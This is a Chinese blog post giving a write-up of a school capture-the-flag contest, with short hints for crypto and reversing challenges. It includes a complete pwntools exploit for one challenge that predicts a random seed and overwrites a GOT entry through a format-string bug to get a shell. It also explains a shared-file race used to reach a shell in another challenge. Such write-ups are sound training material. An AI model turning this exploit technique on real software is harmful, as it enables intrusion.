<!DOCTYPE html><html lang="en" theme-mode="dark"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>23春校赛WP | 大嗨阔(成长度1%)</title><link rel="icon" type="image/x-icon" href="/favicon.ico"><link rel="preload" as="font" crossorigin="anonymous" href="/font/Bender.ttf"><link rel="preload" as="font" crossorigin="anonymous" href="/font/BenderLight.ttf"><link rel="preload" as="font" crossorigin="anonymous" href="/font/JetBrainsMono-Regular.woff2"><link rel="stylesheet" href="/css/arknights.css"><style>@font-face {
  font-family: Bender;
  src: local('Bender'), url("/font/Bender.ttf"), url("/font/Bender.otf");
}
@font-face {
  font-family: BenderLight;
  src: local('BenderLight'), url("/font/BenderLight.ttf");
}
@font-face {
  font-family: 'JetBrains Mono';
  src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}
</style><script>var config = {"root":"/","search":{"preload":true,"activeHolder":"键入以继续","blurHolder":"数据检索","noResult":"无 $0 相关数据"},"code":{"codeInfo":"$0 - $1 行","copy":"复制"}}</script><link type="text/css" rel="stylesheet" href="/lib/encrypt/hbe.style.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/css/all.min.css"><script>if (window.localStorage.getItem('theme-mode') === 'light')
 document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark')
 document.documentElement.setAttribute('theme-mode', 'dark')</script><style>:root {
 --dark-background: url('https://ak.hypergryph.com/assets/index/images/ak/pc/bk.jpg');
 --light-background: url('/img/bk.jpg');
 --theme-encrypt-confirm: '确认'
}</style><script defer src="/js/arknights.js"></script><script defer src="/js/search.js"></script><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><script defer type="module">import mermaid from '//unpkg.com/mermaid@10.5.0/dist/mermaid.esm.mjs';
window.mermaid = mermaid;
code.paintMermaid();
</script><script async src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script async src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script async src="/lib/encrypt/hbe.js"></script><script async src="/js/pjax.js"></script><script class="pjax-js">reset= () => {document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js','data-pjax','.busuanzi'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);document.addEventListener('pjax:success', _ => bszCaller.fetch(
 "//busuanzi.ibruce.info/busuanzi?jsonpCallback=BusuanziCallback", a => {
  bszTag.texts(a),
  bszTag.shows()
}));reset()})</script><meta name="generator" content="Hexo 7.0.0"></head><body><div class="loading" style="opacity: 0;"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><div class="navBtn"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><nav><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="数据检索" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup" tabindex="0"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">Home</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">Archives</span></a></li><li class="navItem"><a class="navBlock" href="/links/"><span class="navItemTitle">Links</span></a></li><li class="navItem"><a class="navBlock" href="/about/"><span class="navItemTitle">About</span></a></li><li class="navItem"><a class="navBlock" href="/games/"><span class="navItemTitle">Games</span></a></li><li class="navItem"><a class="navBlock" href="/daohang/"><span class="navItemTitle">导航</span></a></li></ol></nav></header><article><div id="post-bg"><div id="post-title"><h1>23春校赛WP</h1><div id="post-info"><span>文章发布时间: <div class="control"><time datetime="2023-07-23T13:21:57.000Z" id="date"> 2023-07-23</time></div></span><br><span>最后更新时间: <div class="control"><time datetime="2023-11-19T18:19:55.677Z" id="updated"> 2023-11-20</time></div></span><br><span>文章总字数: <div class="control">700</div></span><br><span>预计阅读时间: <div class="control">3 分钟</div></span><br><span id="busuanzi_container_page_pv">页面浏览：<span class="control" id="busuanzi_value_page_pv">加载中...</span></span></div></div><hr><div id="post-content"><h1 id="签到："><a href="#签到：" class="headerlink" title="签到："></a>签到：</h1><p>在微信公众号发送flag，得到flag</p>
<h1 id="Base："><a href="#Base：" class="headerlink" title="Base："></a>Base：</h1><p> 十六进制转base64，再转随波逐流一把梭</p>
<h1 id="Rot13："><a href="#Rot13：" class="headerlink" title="Rot13："></a>Rot13：</h1><p>就一层加密，rot13解密后套flag</p>
<h1 id="Rsa："><a href="#Rsa：" class="headerlink" title="Rsa："></a>Rsa：</h1><p>百度到原题复制粘贴</p>
<h1 id="山岚："><a href="#山岚：" class="headerlink" title="山岚："></a>山岚：</h1><p>谐音“栅栏”，随波逐流一把梭</p>
<h1 id="Miao："><a href="#Miao：" class="headerlink" title="Miao："></a>Miao：</h1><p>查看ida，发现直接给了shell，尝试cat flag结果输出喵喵喵</p>
<p>尝试套flag{}错误，后来尝试后发现禁用cat，一旦cat就会喵喵喵，找到Linux等效的指令</p>
<h1 id="Baby-re："><a href="#Baby-re：" class="headerlink" title="Baby_re："></a>Baby_re：</h1><p>看不到main函数，查壳，发现upx壳，upx -d一键脱壳，解数独类逆向，gdb调试出数独表，找到网站解出</p>
<p><a href="/downloads_xiaosai/ikun">ikun下载</a></p>
<p><a href="/downloads_xiaosai/life">人生重开下载</a></p>
<h1 id="ikun——随机数的应对，双程序的应用"><a href="#ikun——随机数的应对，双程序的应用" class="headerlink" title="ikun——随机数的应对，双程序的应用"></a>ikun——随机数的应对，双程序的应用</h1><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>context(log_level = <span class="hljs-string">&quot;debug&quot;</span>,arch = <span class="hljs-string">&quot;amd64&quot;</span>,os = <span class="hljs-string">&quot;linux&quot;</span>)<br>elf=ELF(<span class="hljs-string">&quot;./ikun&quot;</span>)<br>puts_got = elf.got[<span class="hljs-string">&quot;puts&quot;</span>]<br>shell=elf.sym[<span class="hljs-string">&quot;realback&quot;</span>]<br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">hex</span>(shell))<br>offset = <span class="hljs-number">12</span><br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">hex</span>(shell))<br>payload2 = fmtstr_payload(offset, &#123;puts_got: shell&#125;)<br>s=process(<span class="hljs-string">&quot;./suiji&quot;</span>)<br>p=process(<span class="hljs-string">&quot;./ikun&quot;</span>)<br>payload1=<span class="hljs-string">&quot;kunaaaaaaaa@&quot;</span><br>p.send(payload1)<br>p.recvuntil(<span class="hljs-string">&quot;@&quot;</span>)<br>sand = u64(p.recvuntil(<span class="hljs-string">&#x27;\x64&#x27;</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b&#x27;\x00&#x27;</span>))<br>s.sendline(<span class="hljs-built_in">str</span>(sand))<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">114</span>):<br>    t=s.recvline()<br>    p.sendafter(<span class="hljs-string">&quot;do:(c/t/r/l)&quot;</span>,t)<br>    s.sendline()<br>p.sendafter(<span class="hljs-string">&quot;Input what you want to say&quot;</span>,payload2)<br><br>p.interactive()<br></code></pre></td></tr></table></figure>

<p>suiji为自行编写的c程序，代码如下</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdio.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdlib.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;time.h&gt;</span></span><br><br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span><br>&#123;<br>  <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> seed; <br>  <span class="hljs-type">int</span> random_number; <br>  <span class="hljs-type">int</span> i; <br>  <span class="hljs-built_in">scanf</span>(<span class="hljs-string">&quot;%u&quot;</span>, &amp;seed);<br>  getchar(); <span class="hljs-comment">//consume extra newline character</span><br>  srand(seed);<br>  <span class="hljs-keyword">for</span> (i = <span class="hljs-number">0</span>; i &lt;= <span class="hljs-number">113</span>; ++i)<br>  &#123;<br>    random_number = rand() % <span class="hljs-number">4</span>;<br>    <span class="hljs-keyword">if</span> (random_number == <span class="hljs-number">0</span>)<br>    &#123;<br>      <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;%c\n&quot;</span>, <span class="hljs-string">&#x27;c&#x27;</span>);<br>    &#125;<br>    <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (random_number == <span class="hljs-number">1</span>)<br>    &#123;<br>      <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;%c\n&quot;</span>, <span class="hljs-string">&#x27;t&#x27;</span>);<br>    &#125;<br>    <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (random_number == <span class="hljs-number">2</span>)<br>    &#123;<br>      <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;%c\n&quot;</span>, <span class="hljs-string">&#x27;r&#x27;</span>);<br>    &#125;<br>    <span class="hljs-keyword">else</span><br>    &#123;<br>      <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;%c\n&quot;</span>, <span class="hljs-string">&#x27;l&#x27;</span>);<br>    &#125;<br>    getchar(); <span class="hljs-comment">//wait for user input to proceed to next iteration</span><br>  &#125;<br>  <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;<br><br></code></pre></td></tr></table></figure>

<p>使用这样的程序嵌套，可以避免被一些绕过性的问题打断脚本</p>
<h1 id="人生重开模拟器——调用文件时多次服务器连接造成漏洞"><a href="#人生重开模拟器——调用文件时多次服务器连接造成漏洞" class="headerlink" title="人生重开模拟器——调用文件时多次服务器连接造成漏洞"></a>人生重开模拟器——调用文件时多次服务器连接造成漏洞</h1><p><strong>有三个函数调用了一个文件，漏洞就出自这里，由于在同一个端口，所以nc服务器以后会使用同一个文件，可以巧妙地利用文件操作，使其中一个窗口的钱数超过200万</strong></p>
<p class='item-img' data-src='file:///C:/Users/heshi/AppData/Local/Temp/msohtmlclip1/01/clip_image002.png'><img src="file:///C:/Users/heshi/AppData/Local/Temp/msohtmlclip1/01/clip_image002.png" alt="img"></p>
<p><strong>初始钱数，这个函数会将money.txt中的钱置零，所以在使用多个窗口时，要先触发这个函数，跳过以后再执行</strong></p>
<p class='item-img' data-src='file:///C:/Users/heshi/AppData/Local/Temp/msohtmlclip1/01/clip_image004.png'><img src="file:///C:/Users/heshi/AppData/Local/Temp/msohtmlclip1/01/clip_image004.png" alt="img"></p>
<p class='item-img' data-src='file:///C:/Users/heshi/AppData/Local/Temp/msohtmlclip1/01/clip_image006.png'><img src="file:///C:/Users/heshi/AppData/Local/Temp/msohtmlclip1/01/clip_image006.png" alt="img"></p>
<p><strong>这个函数会根据参数增加钱数，保存到文件中</strong></p>
<p><strong>思路：</strong></p>
<p><strong>开20个窗口，全部进行到取名字以后</strong></p>
<p><strong>如果出现“你爸爸告诉你家里面很有钱”，直接把这个窗口关掉，不然会导致扣掉一百万</strong></p>
<p><strong>出现其他的字样，保留</strong></p>
<p><strong>随后我们就可以在剩余的窗口里面赚钱（初始的钱数也会叠加）</strong></p>
<p><strong>钱到达200万，创业，get shell</strong></p>
<div id="paginator"></div></div><div id="post-footer"><div id="pages"><div class="footer-link" style="width: 50%;text-align:right;border-right:1px #fe2 solid"><a href="/2023/08/05/%E5%A5%87%E6%80%9D%E5%A6%99%E6%83%B3/%E5%88%9D%E6%8E%A2%E7%88%86%E7%A0%B4/">← 下一篇 初探爆破</a></div><div class="footer-link" style="width: 50%;right:1px;border-left:1px #fe2 solid"><a href="/2023/07/23/WP/23%E7%9C%81%E8%B5%9BWP/">23省赛WP 上一篇 →</a></div></div></div></div><div class="bottom-btn"><div><a class="i-top" id="to-top" onClick="scrolls.scrolltop();" title="回到顶部" style="opacity: 0; display: none;">∧ </a><a class="i-index" id="to-index" href="#toc-div" title="文章目录">≡</a><a class="i-color" id="color-mode" onClick="colorMode.change()" title="切换主题"></a></div></div></article><aside><div id="about"><a href="/" id="logo"><img src="/favicon.ico" alt="Logo"></a><h1 id="Dr"><a href="/">heshi906</a></h1><div id="description"><p>大概只有漫不经心 才是唯一的解药</p></div><div id="social-links"><a class="social" target="_blank" rel="noopener" href="https://github.com/heshi906"><i class="fab fa-github" alt="GitHub"></i></a></div></div><div id="aside-block"><div id="toc-div"><h1>目录</h1><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E7%AD%BE%E5%88%B0%EF%BC%9A"><span class="toc-number">1.</span> <span class="toc-text">签到：</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Base%EF%BC%9A"><span class="toc-number">2.</span> <span class="toc-text">Base：</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Rot13%EF%BC%9A"><span class="toc-number">3.</span> <span class="toc-text">Rot13：</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Rsa%EF%BC%9A"><span class="toc-number">4.</span> <span class="toc-text">Rsa：</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%B1%B1%E5%B2%9A%EF%BC%9A"><span class="toc-number">5.</span> <span class="toc-text">山岚：</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Miao%EF%BC%9A"><span class="toc-number">6.</span> <span class="toc-text">Miao：</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Baby-re%EF%BC%9A"><span class="toc-number">7.</span> <span class="toc-text">Baby_re：</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#ikun%E2%80%94%E2%80%94%E9%9A%8F%E6%9C%BA%E6%95%B0%E7%9A%84%E5%BA%94%E5%AF%B9%EF%BC%8C%E5%8F%8C%E7%A8%8B%E5%BA%8F%E7%9A%84%E5%BA%94%E7%94%A8"><span class="toc-number">8.</span> <span class="toc-text">ikun——随机数的应对，双程序的应用</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BA%BA%E7%94%9F%E9%87%8D%E5%BC%80%E6%A8%A1%E6%8B%9F%E5%99%A8%E2%80%94%E2%80%94%E8%B0%83%E7%94%A8%E6%96%87%E4%BB%B6%E6%97%B6%E5%A4%9A%E6%AC%A1%E6%9C%8D%E5%8A%A1%E5%99%A8%E8%BF%9E%E6%8E%A5%E9%80%A0%E6%88%90%E6%BC%8F%E6%B4%9E"><span class="toc-number">9.</span> <span class="toc-text">人生重开模拟器——调用文件时多次服务器连接造成漏洞</span></a></li></ol></div></div><footer><nobr>构建自 <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr><wbr><nobr> 使用主题 <a target="_blank" rel="noopener" href="https://github.com/Yue-plus/hexo-theme-arknights">Arknights</a></nobr><wbr><nobr> 主题作者 <a target="_blank" rel="noopener" href="https://github.com/Yue-plus">Yue_plus</a></nobr></footer></aside></main><canvas id="canvas-dust"></canvas></body></html>